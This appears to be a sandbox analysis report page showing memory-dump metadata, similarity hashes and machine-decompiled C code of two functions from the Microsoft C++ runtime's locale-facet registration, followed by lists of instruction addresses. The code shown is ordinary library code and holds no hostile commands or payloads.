Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 9b1a942ef6e89fe0d643d042b7a20cdd8d46c8722578f3287177fcae5c69c03f
Instruction ID: cc3fb07c2b6c34cd5eac641f2b4425ccae077610705992838d3b2295ce2ef26a
Opcode Fuzzy Hash: 9b1a942ef6e89fe0d643d042b7a20cdd8d46c8722578f3287177fcae5c69c03f
Instruction Fuzzy Hash: 9F51DCB0904245DFDB26CF58C480FAEBBB4EB42354F22815DD856AB380DB75AE45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480D34, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D480D34(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;
				void* _t334;

				_t305 = __edx;
				_t234 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t330 - 0x14, 0);
				_t315 =  *0x6d53fdc4; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6D451D10();
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6D476A77(_t330 - 0x14);
					return E6D490E67(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6D48283F(__ebx, _t237, __edx, _t307, _t315, __eflags, _t334) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t330 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t307, _t315);
							E6D476A10(_t330 - 0x14, 0);
							_t316 =  *0x6d53fdf0; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6D451D10();
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6D476A77(_t330 - 0x14);
								return E6D490E67(_t308);
							} else {
								__eflags = _t316;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6D4828A7(_t234, _t244, __edx, _t308, _t316, __eflags, _t334) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t330 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t234, _t308, _t316);
										E6D476A10(_t330 - 0x14, 0);
										_t317 =  *0x6d53fdf4; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6D451D10();
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6D476A77(_t330 - 0x14);
											return E6D490E67(_t309);
										} else {
											__eflags = _t317;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6D48290F(_t234, _t251, __edx, _t309, _t317, __eflags, _t334) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t330 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t234, _t309, _t317);
													E6D476A10(_t330 - 0x14, 0);
													_t318 =  *0x6d53fe10; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6D451D10();
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6D476A77(_t330 - 0x14);
														return E6D490E67(_t310);
													} else {
														__eflags = _t318;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6D48298A(_t234, _t258, _t305, _t310, _t318, __eflags, _t334) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t330 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t234, _t310, _t318);
																E6D476A10(_t330 - 0x14, 0);
																_t319 =  *0x6d53fde0; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6D451D10();
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6D476A77(_t330 - 0x14);
																	return E6D490E67(_t311);
																} else {
																	__eflags = _t319;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6D4829F6(_t234, _t265, _t305, _t311, _t319, __eflags, _t334) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t330 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t234, _t311, _t319);
																			E6D476A10(_t330 - 0x14, 0);
																			_t320 =  *0x6d53fe14; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6D451D10();
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6D476A77(_t330 - 0x14);
																				return E6D490E67(_t312);
																			} else {
																				__eflags = _t320;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6D482A62(_t234, _t272, _t305, _t312, _t320, __eflags, _t334) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t330 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t234, _t312, _t320);
																						E6D476A10(_t330 - 0x14, 0);
																						_t321 =  *0x6d53fde4; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6D451D10();
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6D452140( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6D476A77(_t330 - 0x14);
																							return E6D490E67(_t313);
																						} else {
																							__eflags = _t321;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6D482AC8(_t234, _t279, _t305, _t313, _t321, __eflags, _t334) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6D451940();
																									E6D4924F4(_t330 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(4);
																									E6D490E9E(0x6d4fefbc, _t234, _t313, _t321);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_push( *((intOrPtr*)(_t330 + 8)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6d5041ac;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6D4868B7(_t234, _t283, _t305, _t313, _t322,  *_t105, _t334);
																									return E6D490E67(_t322);
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6D478A0B(__eflags, _t313);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6d53fde4 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6D478A0B(__eflags, _t312);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6d53fe14 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6D478A0B(__eflags, _t311);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6d53fde0 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6D478A0B(__eflags, _t310);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6d53fe10 = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6D478A0B(__eflags, _t309);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6d53fdf4 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6D478A0B(__eflags, _t308);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6d53fdf0 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6D478A0B(__eflags, _t307);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6d53fdc4 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6d480d34
0x6d480d34
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d65
0x6d480d6a
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72

APIs

__EH_prolog3.LIBCMT ref: 6D480D3B
std::_Lockit::_Lockit.LIBCPMT ref: 6D480D45

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D480D96
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480DB6
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480DD4

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 1120f240b22f850d85d92d6c53b96acba9058cfcecd3548ce575b19eae614d62
Instruction ID: 11ed2e06494746cad1f0524cea18405a93ba614d5b12e7c57329dac7e4d6a8ec
Opcode Fuzzy Hash: 1120f240b22f850d85d92d6c53b96acba9058cfcecd3548ce575b19eae614d62
Instruction Fuzzy Hash: C211EC328042298BCF04CFA5C854EEE77B5AF81358F26040DE601AB390DF30EE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480DDA, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D480DDA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;
				void* _t290;

				_t264 = __edx;
				_t203 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t286 - 0x14, 0);
				_t273 =  *0x6d53fdf0; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6D451D10();
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6D476A77(_t286 - 0x14);
					return E6D490E67(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6D4828A7(__ebx, _t206, __edx, _t266, _t273, __eflags, _t290) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t286 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t266, _t273);
							E6D476A10(_t286 - 0x14, 0);
							_t274 =  *0x6d53fdf4; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6D451D10();
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6D476A77(_t286 - 0x14);
								return E6D490E67(_t267);
							} else {
								__eflags = _t274;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6D48290F(_t203, _t213, __edx, _t267, _t274, __eflags, _t290) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t286 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t203, _t267, _t274);
										E6D476A10(_t286 - 0x14, 0);
										_t275 =  *0x6d53fe10; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6D451D10();
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6D476A77(_t286 - 0x14);
											return E6D490E67(_t268);
										} else {
											__eflags = _t275;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6D48298A(_t203, _t220, __edx, _t268, _t275, __eflags, _t290) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t286 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t203, _t268, _t275);
													E6D476A10(_t286 - 0x14, 0);
													_t276 =  *0x6d53fde0; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6D451D10();
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6D476A77(_t286 - 0x14);
														return E6D490E67(_t269);
													} else {
														__eflags = _t276;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6D4829F6(_t203, _t227, _t264, _t269, _t276, __eflags, _t290) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t286 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t203, _t269, _t276);
																E6D476A10(_t286 - 0x14, 0);
																_t277 =  *0x6d53fe14; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6D451D10();
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6D476A77(_t286 - 0x14);
																	return E6D490E67(_t270);
																} else {
																	__eflags = _t277;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6D482A62(_t203, _t234, _t264, _t270, _t277, __eflags, _t290) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t286 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t203, _t270, _t277);
																			E6D476A10(_t286 - 0x14, 0);
																			_t278 =  *0x6d53fde4; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6D451D10();
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6D476A77(_t286 - 0x14);
																				return E6D490E67(_t271);
																			} else {
																				__eflags = _t278;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6D482AC8(_t203, _t241, _t264, _t271, _t278, __eflags, _t290) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6D451940();
																						E6D4924F4(_t286 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(4);
																						E6D490E9E(0x6d4fefbc, _t203, _t271, _t278);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_push( *((intOrPtr*)(_t286 + 8)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6d5041ac;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6D4868B7(_t203, _t245, _t264, _t271, _t279,  *_t91, _t290);
																						return E6D490E67(_t279);
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6D478A0B(__eflags, _t271);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6d53fde4 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6D478A0B(__eflags, _t270);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6d53fe14 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6D478A0B(__eflags, _t269);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6d53fde0 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6D478A0B(__eflags, _t268);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6d53fe10 = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6D478A0B(__eflags, _t267);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6d53fdf4 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6D478A0B(__eflags, _t266);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6d53fdf0 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6d480dda
0x6d480dda
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e0b
0x6d480e10
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
